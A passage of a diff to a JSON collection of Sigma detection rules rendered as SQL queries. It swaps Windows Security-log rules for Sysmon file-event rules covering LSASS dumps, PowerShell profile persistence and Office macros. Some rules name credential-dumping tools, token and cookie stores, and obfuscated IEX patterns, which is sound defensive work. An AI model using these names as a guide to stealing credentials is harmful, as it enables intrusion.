Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "VsCode Powershell Profile Modification", + "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", + "status": "experimental", + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unknown" + "Legitimate use of the profile by developers or administrators" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\')" ], - "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" + "filename": "file_event_win_susp_vscode_powershell_profile.yml" }, { - "title": "Access Token Abuse", - "id": 
"02f7c9c1-1ae8-4c6a-8add-04693807f92f", - "status": "experimental", - "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", - "author": "Michaela Adams, Zach Mathis", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "status": "test", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1134.001" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Anti-Virus" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_access_token_abuse.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. 
Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ "attack.credential_access", - "car.2019-04-004", "attack.t1003.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR 
ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": 
"win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "Addition of Domain Trusts", - "id": "0255a820-e564-4e40-af2b-6ac61160335c", - "status": "stable", - "description": "Addition of domains is seldom and should be verified for legitimacy.", - "author": "Thomas Patzke", + "title": "Office Macro File Creation", + "id": "91174a41-dc8f-401b-be89-7bfc140612a0", + "status": "experimental", + "description": "Detects the creation of a new office macro files on the systems", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate extension of domain structure" + "Very common in environments that rely heavily on macro documents" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_susp_add_domain_trust.yml" + "filename": "file_event_win_office_macro_files_created.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "status": "experimental", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of 
the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "cve.2021.44077" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "Tap Driver Installation - Security", - "id": "9c8afa4d-0022-48f0-9456-3712466f9701", - "status": "test", - "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "tags": [ - "attack.exfiltration", - "attack.t1048" - ], + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "status": "experimental", + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Administrative activity", + "PowerShell scripts running as SYSTEM user" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" ], - "filename": "win_security_tap_driver_installation.yml" + "filename": "file_event_win_susp_system_interactive_powershell.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "cve.2021.42278", - "cve.2021.42287", - 
"attack.persistence", - "attack.privilege_escalation", - "attack.t1078" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Admin User Remote Logon", - "id": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "status": "test", - "description": "Detect remote login by Administrator user (depending on internal pattern).", - "author": "juju4", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1078.001", - "attack.t1078.002", - "attack.t1078.003", - "car.2016-04-005" + "attack.persistence", + "attack.execution", + "attack.t1053" ], "falsepositives": [ - "Legitimate administrative activity." 
+ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND AuthenticationPackageName = 'Negotiate' AND TargetUserName LIKE 'Admin%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_admin_rdp_login.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Suspicious PROCEXP152.sys File Created In TMP", + "id": "3da70954-0f2c-4103-adff-b7440368f50e", + "status": "test", + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", + "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.t1216" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_winrm_awl_bypass.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", - "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "status": "test", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" ], 
"falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ - "Programs that connect locally to the RDP port" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND 
(SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Unauthorized System Time Modification", - "id": "faa031b5-21ed-4e02-8881-2591f98d82ed", + "title": "Advanced IP Scanner - File Event", + "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", "status": "test", - "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", - "author": "@neu5ron", + "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", + "author": "@ROxPinTeddy", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "HyperV or other virtualization technologies with binary not listed in filter portion of detection" + "Legitimate administrative use" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4616' AND NOT (((ProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\VBoxService.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND SubjectUserSid = 'S-1-5-19')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\')" ], - "filename": "win_security_susp_time_modification.yml" + "filename": "file_event_win_advanced_ip_scanner.yml" }, { - "title": "Processes Accessing the Microphone and Webcam", - "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "title": "Suspicious Unattend.xml File Access", + "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", "status": "test", - "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. 
They are used to store credentials/answers during the unattended windows install process\n", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1123" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\')" ], - "filename": "win_security_camera_microphone_access.yml" + "filename": "file_event_win_access_susp_unattend_xml.yml" }, { - "title": "Access to ADMIN$ Share", - "id": "098d7118-55bc-4912-a836-dc6483a8d150", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", "status": "test", - "description": "Detects access to $ADMIN share", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Legitimate administrative activity" + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5140' AND ShareName = 'Admin$') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE 
'%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" ], - "filename": "win_security_admin_share_access.yml" + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "title": "Created Files by Microsoft Sync Center", + "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", + "author": "elhoim", "tags": [ + "attack.t1055", + "attack.t1218", "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE 